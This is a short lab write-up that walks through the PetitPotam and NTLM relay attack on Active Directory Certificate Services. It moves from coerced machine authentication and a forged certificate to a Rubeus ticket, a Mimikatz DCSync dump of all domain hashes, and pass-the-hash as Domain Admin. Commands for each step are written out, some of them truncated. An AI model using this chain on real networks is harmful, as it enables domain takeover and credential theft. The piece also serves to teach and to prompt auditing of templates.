Reading Time: 4 minutes

All links of articles and tools at the bottom of the page

There is nothing new i’ve discovered, this is just a few printscreens of what other people on Twitter were talking and I tested in my Lab to realise the gravity of this !

Since then, I already fixed a vulnerable template at a Client’s place which would have rendered this attack possible.

Just saw now, that @remiescourrou had also been writting about this.

Original article was from ExAndroidDev :

The difference with his post, is that I used topotam’s discovery and tool to achieve the same attack

Lab Topology

STEP 0: Compiling ExAndroidDev version of NtlmRelayX

PR : 1101

git clone git clone
cd impacket
git switch ntlmrelayx-adcs-attack
python3 -m pip install .

STEP 1: Prepare NtlmRelayX

Prepare Relay to PKI web service running on DC01 -t -smb2support --adcs

STEP 2: Run PetitPotam to DC02


Translation : Hey DC02 send your machine creds to my Kali ! ( Account : DC02$ )

or you can use the python version from the Kali box also.

Ntlmrelay will generate a CSR and try to abuse a vulnerable PKI template to generate a cert

(of course this only works if the AD CS template is vulnerable ! Will see later the results of the Audit report )

STEP 3: Get a Kerberos Ticket with the Cert by using Rubeus

Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
in my case it was a cert for dc02$ as I relay the machine creds of DC02.

Ticket is now active in my Windows Machine.

You can check with the command klist

You have now an ticket with privileges which will let you DCSyncing the DC

STEP4: DCSync with Mimiktaz to get DA creds

lsadump::dcsync /domain:timatec.local /all /csv

As you can see, we had DCSync rights to be able to dump all hashes of all users in the Domain Controller

PTH to DomainAdmin

As we now have the DomainAdmin NTLM hash, we only need to do a Pass The Hash to use the Domain Admin hash.

This can be achieved by many different ways, here we are using mimikatz pth

On my Windows machine
sekurlsa::pth /user:Administrator /domain:timatec.local /ntlm:5c0c009b522xxxxxxxxxxxxxxxxxxxx

as example I connected to the C$ of the domain controller.

Additional print screens

My initial setup didn’t have a vulnerable PKI template.

So I started to add some configuration to my PKI and to check it was vulnerable, i used the defending powershell script.

Here is the outcome of this script after adding some vulnerable PKI template. We can see ESC8, ESC4 and ESC3 vulnerabilities reported

In this printscreen below we can see the certs generated by the Ntlmrelayx

Before I got my vulnerable template i was having the following Failed requests


Working through your PKI templates with the output of the audit script, until it solved. There is no 0 day, this is working as per design, it’s just a misconfiguration on your PKI server.

Here is again the link for the Audit Script published by HarmJ0y and Lee Christensen

Thanks Clément Labro and 1mm0rt411 as usual for your patience, the knowledge, guidance and expertise

PetitPotam made by topotam

NtlmRelayx from SecureAuthCorp original code :

NtlmRelayx PR from ExAndroidDev

Rubeus from harmj0y code :

Mimikatz from Benjamin Delpy code :